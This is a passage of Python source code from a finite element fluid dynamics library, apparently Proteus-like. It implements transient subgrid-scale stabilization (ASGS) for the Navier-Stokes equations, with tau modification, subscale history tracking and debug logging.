assert dt > 0.0
dtInv = 1.0/dt
self.subgridTmp[ci] *= dtInv
self.subgridTmp[ci] *= self.subgridErrorMassCoef_last[ci]#figure this out
#mwf debug
logEvent("HaukeSangalliTrackSubScales accumulating delta u^n.abs.max= %s dm.max=%s " % (max(numpy.absolute(self.subgridTmp[ci].flat)),max(numpy.absolute(self.subgridErrorMassCoef_last[ci].flat))),1)
#mwf should be
q[('mt',ci)] -= self.subgridTmp[ci]
#don't think this matters right now because called after calculateSubgridError
self.subgridTmp_ip[ci][:] = self.subgridError_ip_last[ci]
self.subgridTmp_ip[ci] *= dtInv
self.subgridTmp_ip[ci] *= self.subgridErrorMassCoef_ip_last[ci]#figure this out
self.cip[('mt',ci)] -= self.subgridTmp_ip[ci]
#
class NavierStokesTransientSubScalesASGS_velocity_pressure(NavierStokesASGS_velocity_pressure):
def __init__(self,coefficients,nd,stabFlag='1',lag=False,delayLagSteps=5,hFactor=1,noPressureStabilization=False,
trackSubScales=False,limit_tau_t=False,tau_t_limit_min=0.0,tau_t_limit_max=1.0):
NavierStokesASGS_velocity_pressure.__init__(self,coefficients,nd,stabFlag=stabFlag,lag=lag,delayLagSteps=delayLagSteps,hFactor=hFactor,
noPressureStabilization=noPressureStabilization)
self.trackSubScales = trackSubScales
self.timeIntegration = None
#apply bounds to tau_t?
self.limit_tau_t = limit_tau_t
self.tau_t_limit_min = tau_t_limit_min
self.tau_t_limit_max = tau_t_limit_max
self.trackSubScales_pressure = True
def initializeElementQuadrature(self,mesh,t,cq):
NavierStokesASGS_velocity_pressure.initializeElementQuadrature(self,mesh,t,cq)
import copy
self.subgridError_last = []
self.subgridErrorMassCoef_last = []
self.subgridTmp = []; self.subgridTmp2 = []
for ci in range(self.nc):
self.subgridTmp.append(numpy.zeros(cq[('u',ci)].shape,'d'))
if self.trackSubScales:
self.subgridError_last.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.subgridErrorMassCoef_last.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.subgridTmp2.append(numpy.zeros(cq[('u',ci)].shape,'d'))
else:
self.subgridError_last.append(None)
self.subgridErrorMassCoef_last.append(None)
if self.lag:
if cq.has_key(('dm',ci,ci)):
cq[('dm_sge',ci,ci)] = copy.deepcopy(cq[('dm',ci,ci)])
if cq.has_key(('dmt',ci,ci)):
cq[('dmt_sge',ci,ci)] = copy.deepcopy(cq[('dmt',ci,ci)])
else:
if cq.has_key(('dm',ci,ci)):
cq[('dm_sge',ci,ci)] = cq[('dm',ci,ci)]
if cq.has_key(('dmt',ci,ci)):
cq[('dmt_sge',ci,ci)] = cq[('dmt',ci,ci)]
def initializeTimeIntegration(self,timeIntegration):
"""
allow for connection with time integration method if tracking subscales
"""
self.timeIntegration = timeIntegration
def updateSubgridErrorHistory(self,initializationPhase=False):
NavierStokesASGS_velocity_pressure.updateSubgridErrorHistory(self,initializationPhase=initializationPhase)
if self.lag:
for ci in range(1,self.nc):
self.cq[('dm_sge',ci,ci)][:] = self.cq[('dm',ci,ci)]
if self.trackSubScales:
#momentum terms
for ci in range(1,self.nc):
if not initializationPhase:
#we are storing subgridError = tau*Res so need to reverse sign
self.subgridError_last[ci].flat[:] = self.cq[('subgridError',ci)].flat
self.subgridError_last[ci] *= -1.0
#mwf debug
logEvent("NS_ASGS tracksubscales updateSubgridErrorHistory subgridError[%s] max = %s min = %s " % (ci,self.subgridError_last[ci].max(),
self.subgridError_last[ci].min()),1)
#how are we going to define subgrid mass?
self.subgridErrorMassCoef_last[ci].flat[:] = self.cq[('dm',ci,ci)].flat
#for pressure we have to store strong residual
if not initializationPhase:
self.subgridError_last[0].flat[:] = self.cq[('pdeResidual',0)].flat
logEvent("NS_ASGS tracksubscales updateSubgridErrorHistory subgridError[0] max = %s min = %s " % (self.subgridError_last[0].max(),
self.subgridError_last[0].min() ),1)
def accumulateSubgridMassHistory(self,q):
"""
incorporate subgrid scale mass accumulation
\delta m^{n}/\delta t^{n+1}
"""
if self.trackSubScales:
for ci in range(1,self.nc):
self.subgridTmp[ci][:] = self.subgridError_last[ci]
dt = self.timeIntegration.dt
assert dt > 0.0
dtInv = 1.0/dt
self.subgridTmp[ci] *= dtInv
self.subgridTmp[ci] *= self.subgridErrorMassCoef_last[ci]#decide how to approximate
logEvent("NS_ASGS trackSubScales accumulating delta u^n ci=%s .abs.max= %s dm.max=%s " % (ci,max(numpy.absolute(self.subgridTmp[ci].flat)),
max(numpy.absolute(self.subgridErrorMassCoef_last[ci].flat))),1)
q[('mt',ci)] -= self.subgridTmp[ci]
def calculateSubgridError(self,q):
import LinearAlgebraTools
oldTau=True
if self.nd == 2:
if self.lag and self.nSteps < self.delayLagSteps:
v = q[('f',0)]
elif self.lag:
v = self.v_last
else:
v = q[('f',0)]
dmttmp = q[('dmt',1,1)]
if self.trackSubScales:
self.subgridTmp[1].fill(0.0)
dmttmp = self.subgridTmp[1]
if oldTau:
if self.coefficients.sd:
csubgridError.calculateSubgridErrorNavierStokes2D_GLS_tau_sd(self.hFactor,
self.mesh.elementDiametersArray,
dmttmp,
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
else:
csubgridError.calculateSubgridErrorNavierStokes2D_GLS_tau(self.hFactor,
self.mesh.elementDiametersArray,
dmttmp,
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
else:
if self.coefficients.sd:
csubgridError.calculateSubgridErrorNavierStokes2D_generic_tau_sd(q['inverse(J)'],
dmttmp,
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
else:
csubgridError.calculateSubgridErrorNavierStokes2D_generic_tau(q['inverse(J)'],
dmttmp,
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
tau0=self.tau[0]
tau1=self.tau[1]
#mwf seeing some difference in tau0 and self.tau_last
#need to synchronize the lagging
#tau0 = self.tau_last[0]
#tau1 = self.tau_last[1]
#TODO: make sure dm_sge is set correctly for lagging
dm_subgrid = q[('dm_sge',1,1)]#density same for both velocity components
if self.trackSubScales:
dt = self.timeIntegration.dt
assert dt > 0.0
dtInv = 1.0/dt
#pressure,
# \delta p = -tau_1*(1+tau_0/dt)*R^{n+1}_p + tau_1*tau_0/dt*R^n_p
#recall that code is expecting subgridError to be tau*R instead of -tau*R
logEvent("NS_ASGS trackScales before transient modficication (tau_s) tau[0].max= %s tau[0].min=%s " % (tau0.max(),tau0.min()),1)
logEvent("NS_ASGS trackScales before transient modficication (tau_s) tau[1].max= %s tau[1].min=%s " % (tau1.max(),tau1.min()),1)
if self.lag:
logEvent("NS_ASGS trackScales before transient modficication (tau_s) nSteps=%d delayLagSteps=%d tau_last[0].max= %s tau_last[0].min= %s " % (self.nSteps,
self.delayLagSteps,
self.tau_last[0].max(),self.tau_last[0].min()),1)
#tau for current pressure subgridError
self.subgridTmp[0][:] = tau0
self.subgridTmp[0] *= dtInv
self.subgridTmp[0] += 1.0
self.subgridTmp[0] *= tau1
#mwf codina has an extra 1/4 in tau?
self.subgridTmp[0] *= 0.25
#tau for history term when updating pressure subgrid error
self.subgridTmp2[0][:] = tau0
self.subgridTmp2[0] *= dtInv
self.subgridTmp2[0] *= tau1
#mwf codina has an extra 1/4 in tau?
self.subgridTmp2[0] *= 0.25
#now modify tau0 --> tau_t0
if tau0.max() > 0.0:
#mwf debug
#import pdb
#pdb.set_trace()
self.subgridTmp[1][:] = tau0
self.subgridTmp[1] *= dt
self.subgridTmp2[1][:] = tau0
self.subgridTmp2[1] *= dm_subgrid
self.subgridTmp2[1] += dt
self.subgridTmp[1] /= self.subgridTmp2[1]
#bound tau_t based on dt size
if self.limit_tau_t:
numpy.clip(self.subgridTmp[1],self.tau_t_limit_min*dt,self.tau_t_limit_max*dt,self.subgridTmp[1])
#
#set tau0 --> to point to subgridTmp[1] since this multiplies momentum residual
#set tau1 --> to point to subgridTmp[0] since this multiplies continuity residual
tau0 = self.subgridTmp[1]
tau1 = self.subgridTmp[0]
#mwf debug
logEvent("NS_ASGS trackScales after modifying tau[0].max= %s tau[0].min= %s " % (tau0.max(),tau0.min()),1)
logEvent("NS_ASGS trackScales after modifying tau[1].max= %s tau[1].min= %s " % (tau1.max(),tau1.min()),1)
#mwf should be 1.0/m'
assert tau0.max() * dm_subgrid.max() /dt <= 1.0, "Subgrid scales, modified tau_t.max() = %s dt = %s dm_subgrid.max() = %s tau.m'/dt = %s must be less than 1 " % (tau.max(),
dt,
dm_subgrid.max(),
tau.max()/dt)
#
#account for old subgrid error in momentum strong residual
for ci in range(1,self.nc):
#tau here should be the same as tau_t in Codina's formalism if dmdt is included?
#calculate \tilde{R}_h = R_h - \delta m^{n}/dt^{n+1}
self.subgridTmp2[ci][:] = self.subgridError_last[ci]
self.subgridTmp2[ci] *= dtInv
self.subgridTmp2[ci] *= self.subgridErrorMassCoef_last[ci]#decide what time level to use
q[('pdeResidual',ci)] -= self.subgridTmp2[ci] #R_h --> \tilde{R}_h
#momentum components
#end track subgrid scales
csubgridError.calculateSubgridErrorNavierStokes2D_GLS_tauRes(tau0,
tau1,
q[('pdeResidual',0)],
q[('dpdeResidual',0,1)],
q[('dpdeResidual',0,2)],
q[('pdeResidual',1)],
q[('dpdeResidual',1,0)],
q[('dpdeResidual',1,1)],
q[('dpdeResidual',1,2)],
q[('pdeResidual',2)],
q[('dpdeResidual',2,0)],
q[('dpdeResidual',2,1)],
q[('dpdeResidual',2,2)],
q[('subgridError',0)],
q[('dsubgridError',0,1)],
q[('dsubgridError',0,2)],
q[('subgridError',1)],
q[('dsubgridError',1,0)],
q[('dsubgridError',1,1)],
q[('dsubgridError',1,2)],
q[('subgridError',2)],
q[('dsubgridError',2,0)],
q[('dsubgridError',2,1)],
q[('dsubgridError',2,2)])
if self.trackSubScales and self.trackSubScales_pressure:
#modify subgrid pressure error, tau1*tau0/dt sits in subgridTmp2[0]
self.subgridTmp2[0] *= self.subgridError_last[0]
q[('subgridError',0)] -= self.subgridTmp2[0]
if self.noPressureStabilization:
q[('subgridError',0)][:]=0.0
q[('dsubgridError',0,1)][:]=0.0
q[('dsubgridError',0,2)][:]=0.0
#
for ci in range(self.nc):
if q.has_key(('mt',ci)):
logEvent("NS_ASGS trackSubScales calculateSubgridError mt[%s] max= %s min=%s " % (ci,q[('mt',ci)].max(),q[('mt',ci)].min()),1)
logEvent("NS_ASGS trackSubScales calculateSubgridError pdeResidual[%s] max= %s min=%s " % (ci,q[('pdeResidual',ci)].max(),q[('pdeResidual',ci)].min()),1)
logEvent("NS_ASGS trackSubScales calculateSubgridError subgridError[%s] max= %s min=%s " % (ci,q[('subgridError',ci)].max(),q[('subgridError',ci)].min()),1)
if self.trackSubScales:
logEvent("NS_ASGS trackSubScales calculateSubgridError subgridError_last[%s] max= %s min=%s " % (ci,self.subgridError_last[ci].max(),self.subgridError_last[ci].min()),1)
for cj in range(self.nc):
if q.has_key(('df_sge',ci,cj)):
logEvent("NS_ASGS trackSubScales calculateSubgridError df_sge %s %s max= %s min=%s " % (ci,cj,q[('df_sge',ci,cj)].max(),q[('df_sge',ci,cj)].min()),1)
elif self.nd == 3:
assert False
for ci in range(self.nd):
q[('cfl',ci+1)][:] = q[('cfl',0)]
| 65.25994
| 215
| 0.337573
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.